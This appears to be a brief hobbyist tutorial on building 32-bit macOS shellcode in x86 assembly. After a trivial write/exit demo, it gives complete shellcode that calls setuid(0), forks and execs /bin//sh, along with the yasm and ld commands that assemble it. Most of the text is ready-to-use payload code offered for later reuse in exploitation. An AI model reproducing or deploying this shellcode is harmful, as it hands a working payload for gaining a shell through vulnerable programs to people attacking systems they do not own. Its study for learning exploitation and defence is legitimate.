How-to make an 32-bit OSX shellcode

We will make a basic shellcode (setuid + fork + execve wait4 +) for 32-bit Intel architecture. The first is to check the syscall.h file.

    Kana:osx capi_x$ cat /usr/include/sys/syscall.h

    #ifdef __APPLE_API_PRIVATE
    #define SYS_syscall        0
    #define SYS_exit           1
    #define SYS_fork           2
    #define SYS_read           3
    #define SYS_write          4
    #define SYS_open           5
    #define SYS_close          6
    #define SYS_wait4          7

This is a small proof of concept (a "hello girls" in asm) demonstrated the feasibility via INT 80h.

    section .text
        global _start

        push len
        push msg
        push 0x1
        mov eax, 0x4
        sub esp, 0x4    ; Stack align
        int 0x80        ; write
        mov eax, 0x1
        sub esp, 0x4
        int 0x80        ; exit

    section .data
        msg db 'Hola nenas!', 0xa
        len equ $ - msg

    Kana:osx capi_x$ file hello
    hello: Mach-O executable i386

    Kana:osx capi_x$ ./hello
    Hola nenas!

Looking at the results, it should be a shellcode such as whole life, taking care of esp and compiling for 32bit Match-O.
And here is the result, nothing really awesome, but it sure someday is useful :-)

    section .text
            global _start

            xor     eax, eax
            push    eax
            push    eax
            mov     al, 23
            int     0x80    ; setuid
            pop     eax
            inc     eax
            inc     eax
            int     0x80    ; fork
            pop     ebx
            push    eax
            push    ebx
            push    ebx
            push    ebx
            push    eax
            xor     eax, eax
            mov     al,7
            push    eax
            int     0x80    ; wait4
            xor     eax, eax
            push    eax
            push    0x68732f2f ; //sh
            push    0x6e69622f ; /bin
            mov     ebx, esp
            push    eax
            push    esp
            push    esp
            push    ebx
            mov     al, 0x3b
            push    eax
            int     0x80    ; execve

I will compile them with yasm, which has support for 64 bit :-)

    yasm -f macho32 forkexecve32.s -o forkexecve32.o
    ld -static forkexecve32.o -o forkexecve32

Happy Hacking!

“No user serviceable parts included.”